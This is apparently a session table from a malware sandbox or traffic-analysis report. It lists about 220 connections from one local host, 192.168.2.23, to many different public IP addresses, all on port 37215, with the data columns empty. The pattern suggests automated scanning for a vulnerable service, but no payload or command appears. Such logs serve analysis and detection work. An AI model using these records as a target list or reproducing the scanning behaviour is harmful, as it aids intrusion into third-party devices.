                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3247192.168.2.2344822222.237.60.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3248192.168.2.2352764197.142.149.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3249192.168.2.2353662197.221.109.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3250192.168.2.235211041.68.195.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3251192.168.2.235838441.136.78.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3252192.168.2.2349682197.83.102.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3253192.168.2.2351020171.42.189.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3254192.168.2.2339926197.194.168.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3255192.168.2.233283671.97.239.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3256192.168.2.233296641.113.219.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3257192.168.2.235536447.41.96.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3258192.168.2.235308841.234.195.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3259192.168.2.233604865.185.8.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3260192.168.2.2342966197.79.156.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3261192.168.2.235350441.30.47.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3262192.168.2.2357590132.227.214.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3263192.168.2.234175241.151.229.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3264192.168.2.2359440157.232.176.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3265192.168.2.234242841.10.54.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3266192.168.2.2349800197.221.5.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3267192.168.2.234706653.228.148.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3268192.168.2.233575641.100.68.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3269192.168.2.2347338157.120.116.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3270192.168.2.235082841.228.40.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3271192.168.2.234797841.73.42.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3272192.168.2.2348780157.142.220.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3273192.168.2.233694041.125.216.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3274192.168.2.234227841.45.104.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3275192.168.2.2352028157.215.173.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3276192.168.2.233306641.46.144.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3277192.168.2.235419853.127.111.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3278192.168.2.2355444176.162.208.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3279192.168.2.2358138197.243.145.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3280192.168.2.2359392175.133.74.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3281192.168.2.2346508197.16.46.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3282192.168.2.2334560157.193.130.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3283192.168.2.2333234197.210.52.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3284192.168.2.233688241.185.218.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3285192.168.2.2335950157.110.143.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3286192.168.2.2344242150.201.210.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3287192.168.2.2356322197.228.236.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3288192.168.2.2347276109.233.39.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3289192.168.2.2336564114.225.232.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3290192.168.2.2332952157.193.64.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3291192.168.2.2337254157.65.149.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3292192.168.2.2358920157.183.97.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3293192.168.2.2356470197.203.40.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3294192.168.2.2350626157.182.143.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3295192.168.2.2354904157.179.60.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3296192.168.2.2342638197.105.11.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3297192.168.2.2341584191.194.207.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3298192.168.2.2346926157.235.231.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3299192.168.2.2345032157.71.244.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3300192.168.2.2347414157.213.97.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3301192.168.2.235524483.38.99.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3302192.168.2.235535241.214.2.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3303192.168.2.2344444157.223.232.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3304192.168.2.2353914105.222.144.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3305192.168.2.2337896157.226.96.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3306192.168.2.233836841.11.32.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3307192.168.2.235800841.89.111.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3308192.168.2.2337890151.178.28.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3309192.168.2.2348734157.96.15.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3310192.168.2.235993072.16.169.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3311192.168.2.2338222197.191.10.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3312192.168.2.2352612197.254.238.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3313192.168.2.2351840197.135.237.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3314192.168.2.233855617.158.47.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3315192.168.2.233835654.236.86.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3316192.168.2.2356498157.43.220.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3317192.168.2.2355036157.108.110.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3318192.168.2.2352274197.249.61.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3319192.168.2.2359468157.15.201.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3320192.168.2.234433241.112.192.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3321192.168.2.2341386136.48.210.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3322192.168.2.2347316197.18.166.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3323192.168.2.233302441.30.218.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3324192.168.2.234681841.177.191.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3325192.168.2.2341698157.105.165.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3326192.168.2.2342984197.142.79.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3327192.168.2.2347990197.12.112.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3328192.168.2.233851251.54.65.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3329192.168.2.2353466157.252.233.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3330192.168.2.2350392197.45.204.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3331192.168.2.2340712197.223.62.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3332192.168.2.235216863.100.155.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3333192.168.2.234058041.14.77.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3334192.168.2.2344880157.234.206.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3335192.168.2.2351580197.81.76.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3336192.168.2.2341366157.43.7.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3337192.168.2.2347452157.215.14.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3338192.168.2.2346664169.53.75.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3339192.168.2.2334556157.41.253.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3340192.168.2.2336402197.162.80.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3341192.168.2.2334242197.186.9.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3342192.168.2.2360918197.174.183.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3343192.168.2.2334362146.0.87.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3344192.168.2.2352152157.129.128.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3345192.168.2.233893823.201.20.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3346192.168.2.2350594157.113.186.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3347192.168.2.2334982157.168.212.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3348192.168.2.2352856206.224.89.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3349192.168.2.233425441.131.187.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3350192.168.2.2354338197.175.64.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3351192.168.2.234881684.138.61.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3352192.168.2.235229441.136.72.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3353192.168.2.2342798157.214.77.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3354192.168.2.235793441.32.94.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3355192.168.2.234924241.36.161.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3356192.168.2.2345822102.240.116.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3357192.168.2.2341538157.205.44.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3358192.168.2.2353252157.186.215.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3359192.168.2.2359204197.192.140.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3360192.168.2.2355970197.132.194.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3361192.168.2.235460489.30.4.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3362192.168.2.2354502164.51.87.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3363192.168.2.2345560197.251.202.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3364192.168.2.2337730157.202.54.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3365192.168.2.233627441.66.227.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3366192.168.2.233460641.152.172.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3367192.168.2.2345646157.18.118.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3368192.168.2.2333192197.196.132.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3369192.168.2.233715441.123.129.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3370192.168.2.2343952157.106.9.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3371192.168.2.234032441.61.103.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3372192.168.2.2342146157.115.170.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3373192.168.2.234534041.74.131.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3374192.168.2.2337546157.86.87.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3375192.168.2.2353130177.25.160.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3376192.168.2.23598888.97.228.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3377192.168.2.234106841.245.125.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3378192.168.2.233776441.135.230.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3379192.168.2.2348784157.188.81.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3380192.168.2.233729041.42.104.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3381192.168.2.2341390197.141.233.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3382192.168.2.235107441.202.18.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3383192.168.2.2338582197.120.155.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3384192.168.2.235075241.128.51.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3385192.168.2.234587241.26.204.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3386192.168.2.2335630157.167.246.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3387192.168.2.2343312157.211.106.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3388192.168.2.2337242197.171.1.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3389192.168.2.234382041.23.185.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3390192.168.2.2340444157.171.103.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3391192.168.2.233442641.199.193.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3392192.168.2.2346608197.235.252.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3393192.168.2.234965041.209.57.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3394192.168.2.23569765.91.123.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3395192.168.2.2357052197.41.1.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3396192.168.2.233761441.24.133.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3397192.168.2.2352340211.39.82.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3398192.168.2.235616241.68.27.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3399192.168.2.2358084172.151.137.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3400192.168.2.233651641.142.255.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3401192.168.2.233882695.31.85.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3402192.168.2.233787299.221.232.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3403192.168.2.234335220.205.249.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3404192.168.2.234272641.235.153.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3405192.168.2.235968041.117.78.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3406192.168.2.2355068122.109.113.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3407192.168.2.2338296197.159.131.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3408192.168.2.2338174197.27.152.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3409192.168.2.2335150197.162.246.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3410192.168.2.2340116157.89.211.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3411192.168.2.2346178157.29.107.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3412192.168.2.235790841.39.204.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3413192.168.2.2339864157.16.243.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3414192.168.2.2347946152.80.191.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3415192.168.2.2355576157.93.27.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3416192.168.2.2349032196.40.124.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3417192.168.2.235677841.0.161.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3418192.168.2.235283285.66.92.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3419192.168.2.2339172157.143.114.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3420192.168.2.234209641.222.253.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3421192.168.2.2337038157.63.168.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3422192.168.2.235741641.204.47.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3423192.168.2.2340170157.74.105.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3424192.168.2.233555061.51.66.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3425192.168.2.2360972197.29.170.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3426192.168.2.2358404184.204.129.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3427192.168.2.2347490197.142.23.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3428192.168.2.2340538197.222.82.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3429192.168.2.2349664197.255.239.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3430192.168.2.2355998174.136.150.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3431192.168.2.2349618157.209.226.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3432192.168.2.233998641.86.15.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3433192.168.2.2354954138.230.101.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3434192.168.2.235638498.195.189.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3435192.168.2.2332836197.255.168.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3436192.168.2.2339264197.178.224.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3437192.168.2.2336144197.38.110.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3438192.168.2.2344938197.47.164.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3439192.168.2.235834241.194.251.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3440192.168.2.233930241.96.127.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3441192.168.2.2343448197.25.23.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3442192.168.2.2349660211.135.134.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3443192.168.2.2344786157.251.91.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3444192.168.2.2347136197.189.62.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3445192.168.2.234994227.230.217.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3446192.168.2.235047442.224.225.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3447192.168.2.234624641.92.7.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3448192.168.2.2338856157.161.250.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3449192.168.2.2356368157.180.220.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3450192.168.2.2350312197.61.31.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3451192.168.2.233319468.133.40.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3452192.168.2.2339836197.81.68.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3453192.168.2.2353396157.22.125.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3454192.168.2.235629641.13.253.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3455192.168.2.2348752197.184.140.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3456192.168.2.2349590157.249.173.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3457192.168.2.2355458207.7.137.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3458192.168.2.235828813.124.29.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3459192.168.2.235298041.12.231.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3460192.168.2.2343616197.118.189.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3461192.168.2.2335772197.181.56.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3462192.168.2.2341004197.132.135.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3463192.168.2.233667841.227.111.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3464192.168.2.2351588157.229.96.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
